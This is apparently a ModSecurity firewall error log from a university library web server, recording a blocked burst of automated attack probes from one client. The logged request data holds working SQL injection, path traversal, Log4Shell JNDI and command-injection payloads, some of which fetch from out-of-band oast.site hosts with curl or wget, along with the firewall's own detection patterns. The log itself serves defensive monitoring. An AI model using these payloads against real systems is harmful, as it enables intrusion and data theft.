"perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO10fsCo-f0AAAPRNdsAAAAf"]
[Tue Aug 29 11:30:55.327304 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:membergroup. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: @`'`/*! found within ARGS:membergroup: @`'`/*!50000Union */ /*!50000select */ md5(999999999) -- @`'`"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/member/ajax_membergroup.php"] [unique_id "ZO10f8Co-f0AAAPMmEoAAAAY"]
[Tue Aug 29 11:30:55.369556 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\\\/Windows\\\\/win.ini')]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: [#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type  found within ARGS_NAMES:name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c\\x5c/Windows\\x5c\\x5c/win.ini')]: name[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('type C:\\x5c/Windows\\x5c/win.ini')]"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/account"] [unique_id "ZO10f8Co-f0AAAOOubMAAAAW"]
[Tue Aug 29 11:30:56.323115 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '1'='1 found within ARGS:username: admin' or '1'='1'#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/hms/user-login.php"] [unique_id "ZO10gMCo-f0AAAOOubYAAAAW"]
[Tue Aug 29 11:30:56.331031 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/showfile.php"] [unique_id "ZO10gMCo-f0AAAPDn2gAAAAP"]
[Tue Aug 29 11:30:56.382889 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://oast.fun/ found within TX:1: oast.fun/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/getFavicon"] [unique_id "ZO10gMCo-f0AAAOOubgAAAAW"]
[Tue Aug 29 11:30:58.303635 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:price_max. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: (*), found within ARGS:price_max: 1.0 AND (SELECT 1 FROM(SELECT COUNT(*),CONCAT(0x7e,md5(999999999),0x7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)''"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/upload/mobile/index.php"] [unique_id "ZO10gsCo-f0AAAOM4bwAAAAU"]
[Tue Aug 29 11:30:58.517679 2023] [:error] [pid 974] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: *\\x22;/ found within ARGS:type: *\\x22;/root/kerbynet.cgi/scripts/getkey ../../../etc/passwd;\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/kerbynet"] [unique_id "ZO10gsCo-f0AAAPOhdYAAAAa"]
[Tue Aug 29 11:30:59.386799 2023] [:error] [pid 1012] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:password. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:password: password$(curl cjmn8l5jmimk2adbbnlg4zfbmehuz3f7a.oast.site)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/forms/doLogin"] [unique_id "ZO10g8Co-f0AAAP05IYAAAAA"]
[Tue Aug 29 11:30:59.478300 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:content. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22; ?> found within ARGS:content: <?php echo \\x222UdxkGgdPPx7K5xqPocLkjZLXv2\\x22; ?>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/file-manager/backend/text"] [unique_id "ZO10g8Co-f0AAAPDn3oAAAAP"]
[Tue Aug 29 11:31:03.858469 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:Event. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:Event: `curl http:/cjmn8l5jmimk2adbbnlgeioua7beihg7f.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/include/makecvs.php"] [unique_id "ZO10h8Co-f0AAAP9He8AAAAW"]
[Tue Aug 29 11:31:03.888067 2023] [:error] [pid 1016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:post_ids. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data:  --  found within ARGS:post_ids: 0) union select md5(999999999),null,null -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO10h8Co-f0AAAP4H9YAAAAI"]
[Tue Aug 29 11:31:04.685937 2023] [:error] [pid 1021] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgpnj6jukdzsu48.oast.site#.salesforce.com/ found within TX:1: cjmn8l5jmimk2adbbnlgpnj6jukdzsu48.oast.site#.salesforce.com/"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/service/error/sfdc_preauth.jsp"] [unique_id "ZO10iMCo-f0AAAP9HfQAAAAW"]
[Tue Aug 29 11:31:04.748565 2023] [:error] [pid 1023] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:path. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:path: `curl http:/cjmn8l5jmimk2adbbnlg6uqsck78s95er.oast.site -H 'User-Agent: n5Umc3'`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/tos/index.php"] [unique_id "ZO10iMCo-f0AAAP-LMYAAAAe"]
[Tue Aug 29 11:31:05.021914 2023] [:error] [pid 1024] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:user_login. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:user_login: ' AND (SELECT 8149 FROM (SELECT(SLEEP(3)))NuqO) AND 'YvuB'='YvuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-json/pie/v1/login"] [unique_id "ZO10icCo-f0AAAQA-6YAAAAi"]
[Tue Aug 29 11:31:05.726364 2023] [:error] [pid 1033] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:user. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: UNION SELECT found within ARGS:user: a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null..."] [severity " [hostname "perpustakaan.unla.ac.id"] [uri "/api.php"] [unique_id "ZO10icCo-f0AAAQJWpoAAAAr"]
[Tue Aug 29 11:31:06.365172 2023] [:error] [pid 1040] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ./../../../../../../../../ found within ARGS:controller: ./../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10isCo-f0AAAQQyiYAAAAy"]
[Tue Aug 29 11:31:06.371752 2023] [:error] [pid 1028] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/sysShell"] [unique_id "ZO10isCo-f0AAAQEGFYAAAAm"]
[Tue Aug 29 11:31:07.355583 2023] [:error] [pid 1036] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:handle. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:handle: com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext('http://cjmn8l5jmimk2adbbnlg34kq694mmt35n.oast.site')"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "perpustakaan.unla.ac.id"] [uri "/console/images/%2e%2e%2fconsole.portal"] [unique_id "ZO10i8Co-f0AAAQMroMAAAAu"]
[Tue Aug 29 11:31:08.312850 2023] [:error] [pid 1027] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:lang. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../..////////// found within ARGS:lang: /../../../..//////////dev/cmdb/sslvpn_websession"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/remote/fgt_lang"] [unique_id "ZO10jMCo-f0AAAQDFRoAAAAl"]
[Tue Aug 29 11:31:09.099296 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:timezone. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:timezone: 1;wget http:/cjmn8l5jmimk2adbbnlg1m65rxqfhh5ih.oast.site;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/upload"] [unique_id "ZO10jcCo-f0AAAP@MwoAAAAZ"]
[Tue Aug 29 11:31:10.327877 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:param. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:param: action=sql sql='select md5(999999999)'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10jsCo-f0AAAOKNukAAAAK"]
[Tue Aug 29 11:31:10.395091 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:dir: 'Pa_Noteexpr curl+cjmn8l5jmimk2adbbnlgircfbbbqh1rbb.oast.sitePa_Note'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/file_transfer.cgi"] [unique_id "ZO10jsCo-f0AAANjpzoAAAAT"]
[Tue Aug 29 11:31:10.403563 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:command: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "perpustakaan.unla.ac.id"] [uri "/pages/systemcall.php"] [unique_id "ZO10jsCo-f0AAAPMmGoAAAAY"]
[Tue Aug 29 11:31:11.323719 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:nodeId[nodeid]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ',@@ found within ARGS:nodeId[nodeid]: 1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,CONCAT('vbulletin','rce',@@version),19,20,21,22,23,24,25,26,27-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/ajax/api/content_infraction/getIndexableContent"] [unique_id "ZO10j8Co-f0AAAOKNuwAAAAK"]
[Tue Aug 29 11:31:11.989223 2023] [:error] [pid 894] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:key: ';`wget http:/cjmn8l5jmimk2adbbnlgsrexc51ubtke5.oast.site;`;#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO10j8Co-f0AAAN@5DEAAAAO"]
[Tue Aug 29 11:31:13.309534 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:j_username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:j_username: ${jndi:ldap://${:-831}${:-468}.${hostName}.username.cjmn8l5jmimk2adbbnlg1dow6ig6g5tmu.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/ccmadmin/j_security_check"] [unique_id "ZO10kcCo-f0AAANjpz8AAAAT"]
[Tue Aug 29 11:31:13.313271 2023] [:error] [pid 1044] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{"params":"w. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x5c\\x22| found within ARGS:{\\x22params\\x22:\\x22w: 123\\x5c\\x22'1234123'\\x5c\\x22|cat /etc/passwd\\x22}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/api/edr/sangforinter/v2/cssp/slog_client"] [unique_id "ZO10kcCo-f0AAAQUH90AAAA2"]
[Tue Aug 29 11:31:13.433427 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "^(?i)(?:ht|f)tps?:\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "154"] [id "950117"] [rev "2"] [msg "Remote File Inclusion Attack"] [data "Matched Data: http://0.0.0.0 found within ARGS:url: http://0.0.0.0:9600/sm/api/v1/firewall/zone/services?zone=;/usr/bin/id;"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "perpustakaan.unla.ac.id"] [uri "/premise/front/getPingData"] [unique_id "ZO10kcCo-f0AAAPDn44AAAAP"]
[Tue Aug 29 11:31:14.317207 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ()))))-- - found within ARGS:id: 1' and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x207c20,md5(999999999),1,user()))))-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO10ksCo-f0AAAPDn48AAAAP"]
[Tue Aug 29 11:31:15.347377 2023] [:error] [pid 1022] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:question_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:question_id: 1 AND (SELECT 7242 FROM (SELECT(SLEEP(4)))HQYx)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10k8Co-f0AAAP@Mw8AAAAZ"]
